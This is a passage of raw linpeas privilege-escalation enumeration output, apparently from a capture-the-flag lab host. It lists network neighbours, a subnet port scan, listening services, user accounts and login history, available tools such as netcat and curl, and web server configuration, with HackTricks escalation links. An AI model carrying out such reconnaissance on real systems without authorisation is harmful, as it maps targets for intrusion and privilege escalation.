see networks(5) for more information link-local 169.254.0.0 eth0: flags=4163 mtu 1500 inet 10.129.18.131 netmask 255.255.0.0 broadcast 10.129.255.255 inet6 fe80::250:56ff:feb9:6684 prefixlen 64 scopeid 0x20 inet6 dead:beef::250:56ff:feb9:6684 prefixlen 64 scopeid 0x0 ether 00:50:56:b9:66:84 txqueuelen 1000 (Ethernet) RX packets 30700 bytes 32636656 (32.6 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 20991 bytes 2787551 (2.7 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 12767 bytes 1125794 (1.1 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 12767 bytes 1125794 (1.1 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ╔══════════╣ Networks and neighbours Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.129.0.1 0.0.0.0 UG 0 0 0 eth0 10.129.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0 Address HWtype HWaddress Flags Mask Iface 10.129.18.159 ether 00:50:56:b9:01:03 C eth0 10.129.18.165 ether 00:50:56:b9:99:7c C eth0 10.129.18.154 ether 00:50:56:b9:8b:d0 C eth0 10.129.18.56 ether 00:50:56:b9:53:0d C eth0 10.129.18.143 ether 00:50:56:b9:30:a2 C eth0 10.129.18.81 ether 00:50:56:b9:db:ca C eth0 10.129.18.160 ether 00:50:56:b9:49:90 C eth0 10.129.18.149 ether 00:50:56:b9:32:0a C eth0 10.129.18.59 ether 00:50:56:b9:3a:e3 C eth0 10.129.18.40 ether 00:50:56:b9:1a:97 C eth0 10.129.18.29 ether 00:50:56:b9:47:ee C eth0 10.129.18.108 ether 00:50:56:b9:a4:90 C eth0 10.129.18.163 ether 00:50:56:b9:1c:37 C eth0 10.129.18.65 ether 00:50:56:b9:99:bd C eth0 10.129.18.144 ether 00:50:56:b9:61:b4 C eth0 10.129.18.43 ether 00:50:56:b9:aa:21 C eth0 10.129.18.122 ether 00:50:56:b9:b6:de C eth0 10.129.18.111 ether 00:50:56:b9:24:2f C eth0 10.129.18.147 ether 00:50:56:b9:0b:70 C eth0 10.129.18.128 ether 00:50:56:b9:76:a2 C eth0 10.129.18.38 ether 00:50:56:b9:72:f1 C eth0 10.129.18.117 ether 00:50:56:b9:87:2e C eth0 10.129.18.8 ether 00:50:56:b9:ea:f8 C eth0 10.129.18.33 ether 00:50:56:b9:a7:48 C eth0 10.129.18.90 ether 00:50:56:b9:f1:a4 C eth0 10.129.18.169 ether 00:50:56:b9:77:6b C eth0 10.129.18.79 ether 00:50:56:b9:58:ab C eth0 10.129.18.158 ether 00:50:56:b9:d3:5b C eth0 10.129.18.60 ether 00:50:56:b9:c1:df C eth0 10.129.18.115 ether 00:50:56:b9:d8:da C eth0 10.129.18.17 ether 00:50:56:b9:c4:43 C eth0 10.129.18.96 ether 00:50:56:b9:ef:f3 C eth0 10.129.18.6 ether 00:50:56:b9:5c:70 C eth0 10.129.18.164 ether 00:50:56:b9:5e:20 C eth0 10.129.18.153 ether 00:50:56:b9:2c:b1 C eth0 10.129.18.63 ether 00:50:56:b9:87:95 C eth0 10.129.18.44 ether 00:50:56:b9:31:fa C eth0 10.129.18.167 ether 00:50:56:b9:dc:75 C eth0 10.129.18.148 ether 00:50:56:b9:83:95 C eth0 10.129.18.137 ether 00:50:56:b9:6f:fe C eth0 10.129.18.47 ether 00:50:56:b9:ea:31 C eth0 10.129.18.126 ether 00:50:56:b9:2a:f7 C eth0 10.129.18.28 ether 00:50:56:b9:7e:19 C eth0 10.129.18.162 ether 00:50:56:b9:59:8f C eth0 10.129.18.151 ether 00:50:56:b9:12:fc C eth0 10.129.0.1 ether 00:50:56:b9:44:e3 C eth0 10.129.18.53 ether 00:50:56:b9:3d:24 C eth0 10.129.18.132 ether 00:50:56:b9:4d:8f C eth0 10.129.18.42 ether 00:50:56:b9:26:ae C eth0 10.129.18.121 ether 00:50:56:b9:e1:e7 C eth0 10.129.18.110 ether 00:50:56:b9:a7:88 C eth0 10.129.18.135 ether 00:50:56:b9:b4:d0 C eth0 10.129.18.37 ether 00:50:56:b9:76:b5 C eth0 10.129.18.105 ether 00:50:56:b9:3c:77 C eth0 10.129.18.94 ether 00:50:56:b9:c0:e4 C eth0 10.129.18.32 ether 00:50:56:b9:dd:51 C eth0 10.129.18.21 ether 00:50:56:b9:3e:66 C eth0 10.129.18.89 ether 00:50:56:b9:0b:04 C eth0 10.129.18.168 ether 00:50:56:b9:f5:0d C eth0 10.129.18.157 ether 00:50:56:b9:84:18 C eth0 10.129.18.35 ether 00:50:56:b9:42:66 C eth0 10.129.18.152 ether 00:50:56:b9:6d:f3 C eth0 10.129.18.141 ether 00:50:56:b9:df:b0 C eth0 10.129.18.0 ether 00:50:56:b9:30:80 C eth0 10.129.18.166 ether 00:50:56:b9:68:d9 C eth0 10.129.18.155 ether 00:50:56:b9:61:71 C eth0 10.129.18.125 ether 00:50:56:b9:82:3d C eth0 10.129.18.3 ether 00:50:56:b9:57:7c C eth0 10.129.18.161 ether 00:50:56:b9:77:e8 C eth0 10.129.18.150 ether 00:50:56:b9:11:06 C eth0 10.129.18.41 ether 00:50:56:b9:25:fb C eth0 10.129.18.145 ether 00:50:56:b9:94:be C eth0 10.129.18.55 ether 00:50:56:b9:67:fe C eth0 10.129.18.134 ether 00:50:56:b9:09:86 C eth0 10.129.18.123 ether 00:50:56:b9:af:4c C eth0 10.129.18.118 ether 00:50:56:b9:2a:5e C eth0 10.129.18.20 ether 00:50:56:b9:cc:05 C eth0 10.129.18.107 ether 00:50:56:b9:1a:99 C eth0 10.129.18.156 ether 00:50:56:b9:c9:fb C eth0 10.129.18.34 ether 00:50:56:b9:bf:05 C eth0 10.129.18.113 ether 00:50:56:b9:56:f5 C eth0 10.129.18.102 ether 00:50:56:b9:f4:f2 C eth0 10.129.18.91 ether 00:50:56:b9:0c:9c C eth0 ╔══════════╣ Iptables rules iptables rules Not Found ╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1627/nginx: worker tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN 1759/node tcp6 0 0 :::80 :::* LISTEN 1627/nginx: worker tcp6 0 0 :::22 :::* LISTEN - ╔══════════╣ Can I sniff with tcpdump? No ╔══════════╣ Internet Access? Ping is not available Port 80 is not accessible Port 443 is not accessible DNS not available ╔══════════╣ Scanning local networks (using /24) ══╣ Discovering hosts in 10.129.18.131/24 Scanning top ports of 10.129.18.0 [+] Open port at: 10.129.18.0:22 [+] Open port at: 10.129.18.0:80 Scanning top ports of 10.129.18.102 [+] Open port at: 10.129.18.102:22 [+] Open port at: 10.129.18.102:80 Scanning top ports of 10.129.18.105 [+] Open port at: 10.129.18.105:22 [+] Open port at: 10.129.18.105:80 Scanning top ports of 10.129.18.107 [+] Open port at: 10.129.18.107:22 [+] Open port at: 10.129.18.107:80 Scanning top ports of 10.129.18.108 [+] Open port at: 10.129.18.108:22 [+] Open port at: 10.129.18.108:80 Scanning top ports of 10.129.18.110 [+] Open port at: 10.129.18.110:22 [+] Open port at: 10.129.18.110:80 Scanning top ports of 10.129.18.111 [+] Open port at: 10.129.18.111:22 [+] Open port at: 10.129.18.111:80 Scanning top ports of 10.129.18.113 [+] Open port at: 10.129.18.113:22 [+] Open port at: 10.129.18.113:80 Scanning top ports of 10.129.18.115 [+] Open port at: 10.129.18.115:22 [+] Open port at: 10.129.18.115:80 Scanning top ports of 10.129.18.117 [+] Open port at: 10.129.18.117:22 [+] Open port at: 10.129.18.117:80 Scanning top ports of 10.129.18.118 [+] Open port at: 10.129.18.118:22 [+] Open port at: 10.129.18.118:80 Scanning top ports of 10.129.18.121 [+] Open port at: 10.129.18.121:22 [+] Open port at: 10.129.18.121:80 Scanning top ports of 10.129.18.123 [+] Open port at: 10.129.18.123:22 [+] Open port at: 10.129.18.123:80 Scanning top ports of 10.129.18.125 [+] Open port at: 10.129.18.125:22 [+] Open port at: 10.129.18.125:80 Scanning top ports of 10.129.18.126 [+] Open port at: 10.129.18.126:22 [+] Open port at: 10.129.18.126:80 Scanning top ports of 10.129.18.128 [+] Open port at: 10.129.18.128:22 [+] Open port at: 10.129.18.128:80 Scanning top ports of 10.129.18.131 (local) [+] Open port at: 10.129.18.131:22 [+] Open port at: 10.129.18.131:80 Scanning top ports of 10.129.18.132 [+] Open port at: 10.129.18.132:22 [+] Open port at: 10.129.18.132:80 Scanning top ports of 10.129.18.134 [+] Open port at: 10.129.18.134:22 [+] Open port at: 10.129.18.134:80 Scanning top ports of 10.129.18.135 [+] Open port at: 10.129.18.135:22 [+] Open port at: 10.129.18.135:80 Scanning top ports of 10.129.18.137 [+] Open port at: 10.129.18.137:22 [+] Open port at: 10.129.18.137:80 Scanning top ports of 10.129.18.141 [+] Open port at: 10.129.18.141:22 [+] Open port at: 10.129.18.141:80 Scanning top ports of 10.129.18.144 [+] Open port at: 10.129.18.144:22 [+] Open port at: 10.129.18.144:80 Scanning top ports of 10.129.18.145 [+] Open port at: 10.129.18.145:22 [+] Open port at: 10.129.18.145:80 Scanning top ports of 10.129.18.150 [+] Open port at: 10.129.18.150:22 [+] Open port at: 10.129.18.150:80 Scanning top ports of 10.129.18.151 [+] Open port at: 10.129.18.151:22 [+] Open port at: 10.129.18.151:80 Scanning top ports of 10.129.18.152 [+] Open port at: 10.129.18.152:22 [+] Open port at: 10.129.18.152:80 Scanning top ports of 10.129.18.155 [+] Open port at: 10.129.18.155:22 [+] Open port at: 10.129.18.155:80 Scanning top ports of 10.129.18.156 [+] Open port at: 10.129.18.156:22 [+] Open port at: 10.129.18.156:80 Scanning top ports of 10.129.18.157 [+] Open port at: 10.129.18.157:22 [+] Open port at: 10.129.18.157:80 Scanning top ports of 10.129.18.158 [+] Open port at: 10.129.18.158:22 [+] Open port at: 10.129.18.158:80 Scanning top ports of 10.129.18.159 [+] Open port at: 10.129.18.159:22 [+] Open port at: 10.129.18.159:80 Scanning top ports of 10.129.18.160 [+] Open port at: 10.129.18.160:22 [+] Open port at: 10.129.18.160:80 Scanning top ports of 10.129.18.161 [+] Open port at: 10.129.18.161:22 [+] Open port at: 10.129.18.161:80 Scanning top ports of 10.129.18.162 [+] Open port at: 10.129.18.162:22 [+] Open port at: 10.129.18.162:80 Scanning top ports of 10.129.18.163 [+] Open port at: 10.129.18.163:22 [+] Open port at: 10.129.18.163:80 Scanning top ports of 10.129.18.164 [+] Open port at: 10.129.18.164:22 [+] Open port at: 10.129.18.164:80 Scanning top ports of 10.129.18.165 [+] Open port at: 10.129.18.165:22 [+] Open port at: 10.129.18.165:80 Scanning top ports of 10.129.18.166 [+] Open port at: 10.129.18.166:22 [+] Open port at: 10.129.18.166:80 Scanning top ports of 10.129.18.167 [+] Open port at: 10.129.18.167:22 [+] Open port at: 10.129.18.167:80 Scanning top ports of 10.129.18.168 [+] Open port at: 10.129.18.168:22 [+] Open port at: 10.129.18.168:80 Scanning top ports of 10.129.18.169 [+] Open port at: 10.129.18.169:22 [+] Open port at: 10.129.18.169:80 Scanning top ports of 10.129.18.17 [+] Open port at: 10.129.18.17:22 [+] Open port at: 10.129.18.17:80 Scanning top ports of 10.129.18.170 [+] Open port at: 10.129.18.170:22 [+] Open port at: 10.129.18.170:80 Scanning top ports of 10.129.18.171 [+] Open port at: 10.129.18.171:22 [+] Open port at: 10.129.18.171:80 Scanning top ports of 10.129.18.172 [+] Open port at: 10.129.18.172:22 [+] Open port at: 10.129.18.172:80 Scanning top ports of 10.129.18.173 [+] Open port at: 10.129.18.173:22 [+] Open port at: 10.129.18.173:80 Scanning top ports of 10.129.18.174 [+] Open port at: 10.129.18.174:22 [+] Open port at: 10.129.18.174:80 Scanning top ports of 10.129.18.175 [+] Open port at: 10.129.18.175:22 [+] Open port at: 10.129.18.175:80 Scanning top ports of 10.129.18.20 [+] Open port at: 10.129.18.20:22 [+] Open port at: 10.129.18.20:80 Scanning top ports of 10.129.18.21 [+] Open port at: 10.129.18.21:22 [+] Open port at: 10.129.18.21:80 Scanning top ports of 10.129.18.28 [+] Open port at: 10.129.18.28:22 [+] Open port at: 10.129.18.28:80 Scanning top ports of 10.129.18.29 [+] Open port at: 10.129.18.29:22 [+] Open port at: 10.129.18.29:80 Scanning top ports of 10.129.18.3 [+] Open port at: 10.129.18.3:22 [+] Open port at: 10.129.18.3:80 Scanning top ports of 10.129.18.32 [+] Open port at: 10.129.18.32:22 [+] Open port at: 10.129.18.32:80 Scanning top ports of 10.129.18.33 [+] Open port at: 10.129.18.33:22 [+] Open port at: 10.129.18.33:80 Scanning top ports of 10.129.18.34 [+] Open port at: 10.129.18.34:22 [+] Open port at: 10.129.18.34:80 Scanning top ports of 10.129.18.35 [+] Open port at: 10.129.18.35:22 [+] Open port at: 10.129.18.35:80 Scanning top ports of 10.129.18.37 [+] Open port at: 10.129.18.37:22 [+] Open port at: 10.129.18.37:80 Scanning top ports of 10.129.18.38 [+] Open port at: 10.129.18.38:22 [+] Open port at: 10.129.18.38:80 Scanning top ports of 10.129.18.40 [+] Open port at: 10.129.18.40:22 [+] Open port at: 10.129.18.40:80 Scanning top ports of 10.129.18.41 [+] Open port at: 10.129.18.41:22 [+] Open port at: 10.129.18.41:80 Scanning top ports of 10.129.18.42 [+] Open port at: 10.129.18.42:22 [+] Open port at: 10.129.18.42:80 Scanning top ports of 10.129.18.43 [+] Open port at: 10.129.18.43:22 [+] Open port at: 10.129.18.43:80 Scanning top ports of 10.129.18.44 [+] Open port at: 10.129.18.44:22 [+] Open port at: 10.129.18.44:80 Scanning top ports of 10.129.18.47 [+] Open port at: 10.129.18.47:22 [+] Open port at: 10.129.18.47:80 Scanning top ports of 10.129.18.53 [+] Open port at: 10.129.18.53:22 [+] Open port at: 10.129.18.53:80 Scanning top ports of 10.129.18.55 [+] Open port at: 10.129.18.55:22 [+] Open port at: 10.129.18.55:80 Scanning top ports of 10.129.18.56 [+] Open port at: 10.129.18.56:22 [+] Open port at: 10.129.18.56:80 Scanning top ports of 10.129.18.59 [+] Open port at: 10.129.18.59:22 [+] Open port at: 10.129.18.59:80 Scanning top ports of 10.129.18.6 [+] Open port at: 10.129.18.6:22 [+] Open port at: 10.129.18.6:80 Scanning top ports of 10.129.18.60 [+] Open port at: 10.129.18.60:22 [+] Open port at: 10.129.18.60:80 Scanning top ports of 10.129.18.63 [+] Open port at: 10.129.18.63:22 [+] Open port at: 10.129.18.63:80 Scanning top ports of 10.129.18.65 [+] Open port at: 10.129.18.65:22 [+] Open port at: 10.129.18.65:80 Scanning top ports of 10.129.18.79 [+] Open port at: 10.129.18.79:22 [+] Open port at: 10.129.18.79:80 Scanning top ports of 10.129.18.8 [+] Open port at: 10.129.18.8:22 [+] Open port at: 10.129.18.8:80 Scanning top ports of 10.129.18.81 [+] Open port at: 10.129.18.81:22 [+] Open port at: 10.129.18.81:80 Scanning top ports of 10.129.18.89 [+] Open port at: 10.129.18.89:22 [+] Open port at: 10.129.18.89:80 Scanning top ports of 10.129.18.90 [+] Open port at: 10.129.18.90:22 [+] Open port at: 10.129.18.90:80 Scanning top ports of 10.129.18.91 [+] Open port at: 10.129.18.91:22 [+] Open port at: 10.129.18.91:80 Scanning top ports of 10.129.18.94 [+] Open port at: 10.129.18.94:22 [+] Open port at: 10.129.18.94:80 Scanning top ports of 10.129.18.96 [+] Open port at: 10.129.18.96:22 [+] Open port at: 10.129.18.96:80 ══╣ Scanning top ports of host.docker.internal ╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=33(www-data) gid=33(www-data) groups=33(www-data) ╔══════════╣ Do I have PGP keys? /usr/bin/gpg netpgpkeys Not Found netpgp Not Found ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (1) gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it ╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2 [Configuration] AdminIdentities=unix-user:0 [Configuration] AdminIdentities=unix-group:sudo;unix-group:admin ╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console dev:x:1000:1000:,,,:/home/dev:/bin/bash root:x:0:0:root:/root:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=1000(dev) gid=1000(dev) groups=1000(dev) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup) uid=106(uuidd) gid=110(uuidd) groups=110(uuidd) uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup) uid=108(landscape) gid=112(landscape) groups=112(landscape) uid=109(pollinate) gid=1(daemon[0m) groups=1(daemon[0m) uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=999(_laurel) gid=999(_laurel) groups=999(_laurel) ╔══════════╣ Login now 11:35:20 up 2:37, 0 users, load average: 19.85, 21.69, 12.65 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ╔══════════╣ Last logons reboot system boot Sun Feb 12 08:57:45 2023 still running 0.0.0.0 dev pts/0 Wed Feb 8 12:55:27 2023 - Wed Feb 8 12:57:32 2023 (00:02) 10.10.14.23 reboot system boot Wed Feb 8 12:55:01 2023 - Wed Feb 8 12:57:32 2023 (00:02) 0.0.0.0 dev pts/0 Wed Feb 8 12:46:06 2023 - Wed Feb 8 12:48:54 2023 (00:02) 10.10.14.23 reboot system boot Wed Feb 8 12:45:38 2023 - Wed Feb 8 12:48:54 2023 (00:03) 0.0.0.0 dev pts/0 Wed Feb 8 12:14:41 2023 - Wed Feb 8 12:16:08 2023 (00:01) 10.10.14.23 reboot system boot Wed Feb 8 12:14:20 2023 - Wed Feb 8 12:16:09 2023 (00:01) 0.0.0.0 wtmp begins Wed Feb 8 12:14:20 2023 ╔══════════╣ Last time logon each user Username Port From Latest dev pts/0 10.10.14.23 Wed Feb 8 12:55:27 +0000 2023 ╔══════════╣ Password policy PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...) ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!! ╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════ ╚══════════════════════╝ ╔══════════╣ Useful software /usr/bin/base64 /usr/bin/curl /usr/bin/g++ /usr/bin/gcc /usr/bin/lxc /usr/bin/make /bin/nc /bin/netcat /usr/bin/perl /usr/bin/php /bin/ping /usr/bin/python3 /usr/bin/python3.6 /usr/bin/sudo /usr/bin/wget ╔══════════╣ Installed Compilers ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler /usr/bin/gcc /usr/bin/g++ ╔══════════╣ Searching mysql credentials and exec ╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: Server version: Apache/2.4.29 (Ubuntu) Server built: 2023-01-31T14:01:53 httpd Not Found Nginx version: /etc/apache2/mods-available/php7.4.conf- /etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-available/php7.4.conf- /etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source -- /etc/apache2/mods-enabled/php7.4.conf- /etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-enabled/php7.4.conf- /etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php-source ══╣ Nginx modules ngx_http_geoip_module.so ngx_http_image_filter_module.so ngx_http_xslt_filter_module.so ngx_mail_module.so ngx_stream_module.so ══╣ PHP exec extensions drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/apache2/sites-enabled drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/apache2/sites-enabled lrwxrwxrwx 1 root root 35 Nov 20 21:53 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/nginx/sites-enabled drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/nginx/sites-enabled lrwxrwxrwx 1 root root 34 Nov 20 21:46 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default server { listen 80 default_server; listen [::]:80 default_server; root /var/www/html; index index.html index.htm index.nginx-debian.html; server_name _; location / { proxy_pass http://127.0.0.1:3000/; } } server { listen 80; listen [::]:80; server_name prd.m.rendering-api.interface.htb; root /var/www/api; index index.php; location / { fastcgi_pass unix:/run/php/php7.4-fpm.sock; fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name; include fastcgi_params; try_files $uri $uri/ /index.php; } } -rw-r--r-- 1 root root 1332 Feb 23 2021 /etc/apache2/sites-available/000-default.conf ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined lrwxrwxrwx 1 root root 35 Nov 20 21:53 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined -rw-r--r-- 1 root root 73002 Nov 8 11:33 /etc/php/7.4/apache2/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 72600 Nov 8 11:33 /etc/php/7.4/cli/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 73002 Nov 8 11:33 /etc/php/7.4/fpm/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 1482 Apr 6 2018 /etc/nginx/nginx.conf user www-data; worker_processes auto; pid /run/nginx.pid; include /etc/nginx/modules-enabled/*.conf; events { worker_connections 768; } http { sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; include /etc/nginx/mime.types; default_type application/octet-stream; ssl_prefer_server_ciphers on; access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; gzip on; include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; } -rw-r--r-- 1 root root 389 Apr 6 2018 /etc/default/nginx -rwxr-xr-x 1 root root 4579 Apr 6 2018 /etc/init.d/nginx -rw-r--r-- 1 root root 329 Apr 6 2018 /etc/logrotate.d/nginx drwxr-xr-x 8 root root 4096 Jan 16 09:49 /etc/nginx -rw-r--r-- 1 root root 1482 Apr 6 2018 /etc/nginx/nginx.conf user www-data; worker_processes auto; pid /run/nginx.pid; include /etc/nginx/modules-enabled/*.conf; events { worker_connections 768; } http { sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; include /etc/nginx/mime.types; default_type application/octet-stream; ssl_prefer_server_ciphers on; access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; gzip on; include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; } lrwxrwxrwx 1 root root 61 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-image-filter.conf -> /usr/share/nginx/modules-available/mod-http-image-filter.conf load_module modules/ngx_http_image_filter_module.so; lrwxrwxrwx 1 root root 48 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-mail.conf -> /usr/share/nginx/modules-available/mod-mail.conf load_module modules/ngx_mail_module.so; lrwxrwxrwx 1 root root 50 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-stream.conf -> /usr/share/nginx/modules-available/mod-stream.conf load_module modules/ngx_stream_module.so; lrwxrwxrwx 1 root root 60 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf -> /usr/share/nginx/modules-available/mod-http-xslt-filter.conf load_module modules/ngx_http_xslt_filter_module.so; lrwxrwxrwx 1 root root 54 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-geoip.conf -> /usr/share/nginx/modules-available/mod-http-geoip.conf load_module modules/ngx_http_geoip_module.so; -rw-r--r-- 1 root root 217 Apr 6 2018 /etc/nginx/snippets/snakeoil.conf ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem; ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key; -rw-r--r-- 1 root root 422 Apr 6 2018 /etc/nginx/snippets/fastcgi-php.conf fastcgi_split_path_info ^(.+\.php)(/.+)$; try_files $fastcgi_script_name =404; set $path_info $fastcgi_path_info; fastcgi_param PATH_INFO $path_info; fastcgi_index index.php; include fastcgi.conf; -rw-r--r-- 1 root root 1077 Apr 6 2018 /etc/nginx/fastcgi.conf fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param QUERY_STRING $query_string; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param CONTENT_TYPE $content_type; fastcgi_param CONTENT_LENGTH $content_length; fastcgi_param SCRIPT_NAME $fastcgi_script_name; fastcgi_param REQUEST_URI $request_uri; fastcgi_param DOCUMENT_URI $document_uri; fastcgi_param DOCUMENT_ROOT $document_root; fastcgi_param SERVER_PROTOCOL $server_protocol; fastcgi_param REQUEST_SCHEME $scheme; fastcgi_param HTTPS $https if_not_empty; fastcgi_param GATEWAY_INTERFACE CGI/1.1; fastcgi_param SERVER_SOFTWARE nginx/$nginx_version; fastcgi_param REMOTE_ADDR $remote_addr; fastcgi_param REMOTE_PORT $remote_port; fastcgi_param SERVER_ADDR $server_addr; fastcgi_param SERVER_PORT $server_port; fastcgi_param SERVER_NAME $server_name; fastcgi_param REDIRECT_STATUS 200; -rw-r--r-- 1 root root 374 Apr 6 2018 /etc/ufw/applications.d/nginx drwxr-xr-x 3 root root 4096 Nov 20 21:46 /usr/lib/nginx -rwxr-xr-x 1 root root 1149096 Nov 10 06:38 /usr/sbin/nginx drwxr-xr-x 2 root root 4096 Jan 16 09:49 /usr/share/doc/nginx drwxr-xr-x 4 root root 4096 Nov 20 21:46 /usr/share/nginx -rw-r--r-- 1 root root 52 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-xslt-filter.conf load_module modules/ngx_http_xslt_filter_module.so; -rw-r--r-- 1 root root 46 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-geoip.conf load_module modules/ngx_http_geoip_module.so; -rw-r--r-- 1 root root 42 Nov 10 06:38 /usr/share/nginx/modules-available/mod-stream.conf load_module modules/ngx_stream_module.so; -rw-r--r-- 1 root root 40 Nov 10 06:38 /usr/share/nginx/modules-available/mod-mail.conf load_module modules/ngx_mail_module.so; -rw-r--r-- 1 root root 53 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-image-filter.conf load_module modules/ngx_http_image_filter_module.so; drwxr-xr-x 7 root root 4096 Jan 16 09:49 /var/lib/nginx drwxr-xr-x 2 root adm 4096 Feb 8 12:14 /var/log/nginx ╔══════════╣ Analyzing FastCGI Files (limit 70) -rw-r--r-- 1 root root 1007 Apr 6 2018 /etc/nginx/fastcgi_params ╔══════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 1044 Aug 16 18:38 /usr/share/doc/rsync/examples/rsyncd.conf [ftp] comment = public archive path = /var/www/pub use chroot = yes lock file = /var/lock/rsyncd read only = yes list = yes uid = nobody gid = nogroup strict modes = yes ignore errors = no ignore nonreadable = 